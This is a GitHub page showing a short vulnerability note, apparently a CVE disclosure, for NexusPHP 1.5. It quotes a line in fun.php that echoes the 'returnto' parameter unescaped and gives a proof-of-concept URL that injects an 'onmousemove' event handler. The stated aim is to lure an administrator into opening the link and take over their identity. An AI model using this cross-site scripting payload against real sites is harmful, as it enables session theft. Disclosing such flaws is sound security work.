Permalink
Cannot retrieve contributors at this time
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
cve/1.txt
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
17 lines (13 sloc)
636 Bytes
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # by yangchonghui | |
| ''' | |
| Send URL to the web administrator to complete the attack,get the administrator's identity | |
| Source: | |
| fun.php:26 | |
| stderr($lang_fun['std_delete_fun'],$lang_fun['text_please_click'] ."<a class=altlink href=?action=delete&id=$id&returnto=$returnto&sure=1>".$lang_fun['text_here_if_sure'],false); | |
| Affected software: NexusPHP 1.5 | |
| Software Link: http://sourceforge.net/projects/nexusphp/ | |
| Free to modify and redistribute this program. | |
| Use at your own risk and you are responsible for what you are doing. | |
| ''' | |
| exploit: | |
| http://localhost/fun.php?action=delete&returnto=1%20onmousemove=alert(1)%20alt=&id=1&sure=1 |